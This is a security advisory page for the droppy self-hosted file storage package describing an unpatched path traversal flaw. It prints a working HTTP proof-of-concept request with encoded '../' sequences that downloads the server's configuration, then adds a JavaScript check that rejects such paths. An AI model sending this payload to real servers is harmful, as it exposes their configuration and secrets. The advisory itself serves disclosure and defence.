droppy@10.0.5 vulnerabilities

Self-hosted file storage

Direct Vulnerabilities

Known vulnerabilities in the droppy package. This does not include vulnerabilities belonging to this package’s dependencies.

Vulnerability Vulnerable Version
  • M
Path Traversal

droppy is a library for self-hosted file storage.

Affected versions of this package are vulnerable to Path Traversal. It is possible to traverse directories to fetch configuration files from a droppy server.

PoC

GET /!/zip/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%73%72%76%2f%64%72%6f%70%70%79%2f%63%6f%6e%66%69%67 HTTP/1.1
Host: 192.168.0.11:8989
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: s=XtlnyU3If2YoVi8jiExHS++NwzrMpQMbmS0l/usCPJcH2J8S
Upgrade-Insecure-Requests: 1




HTTP/1.1 200 OK
Content-Type: text/plain
Content-Disposition: attachment; filename="config.zip"
Cache-Control: private, max-age=0
ETag: "4a-akoxq55ZKs8DpqVaiOcP6h8oCoI"
Date: Sun, 25 Oct 2020 18:27:10 GMT
Connection: close
Content-Length: 847


Backend Request: /!/zip/../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../srv/droppy/config
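A server-side containment check that rejects the request above: decode the path once, normalise it, and refuse anything that climbs above the served root. This is an added example, not droppy's code; `FILES_ROOT`, `resolveInsideRoot` and the sample requests are assumptions constructed for illustration.

```javascript
// Added example, not droppy's implementation.
const ZIP_PREFIX = "/!/zip/";           // route used in the PoC above
const FILES_ROOT = "/srv/droppy/files"; // assumption: directory the server is meant to expose

// Map a raw request path to an absolute path inside `root`.
// Returns null when the request must be rejected.
function resolveInsideRoot(root, rawUrlPath) {
  if (!rawUrlPath.startsWith(ZIP_PREFIX)) return null;

  let decoded;
  try {
    // Decode exactly once. Any "%2e" still present afterwards stays a literal
    // file name character and must never be decoded again further down.
    decoded = decodeURIComponent(rawUrlPath.slice(ZIP_PREFIX.length));
  } catch (err) {
    return null; // malformed percent-encoding
  }

  // NUL bytes and backslashes have no place in a POSIX-style relative path.
  if (decoded.includes("\0") || decoded.includes("\\")) return null;

  const segments = [];
  for (const seg of decoded.split("/")) {
    if (seg === "" || seg === ".") continue;
    if (seg === "..") {
      if (segments.length === 0) return null; // would climb above root
      segments.pop();
    } else {
      segments.push(seg);
    }
  }
  return segments.length ? root + "/" + segments.join("/") : root;
}

// Constructed sample requests; the second has the same shape as the PoC.
const samples = [
  "/!/zip/docs/report",
  "/!/zip/" + "%2e%2e%2f".repeat(4) + "srv%2fdroppy%2fconfig",
  "/!/zip/a/%2e%2e/%2e%2e/etc",
];
for (const s of samples) {
  const resolved = resolveInsideRoot(FILES_ROOT, s);
  console.log(resolved === null ? "REJECT" : "ALLOW ", s.slice(0, 60), "->", resolved);
}
```

Lexical normalisation does not follow symlinks; a deployment should also compare the `fs.realpath` of the result against the root before opening the file.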

How to fix Path Traversal?

There is no fixed version for droppy.

Vulnerable Version: *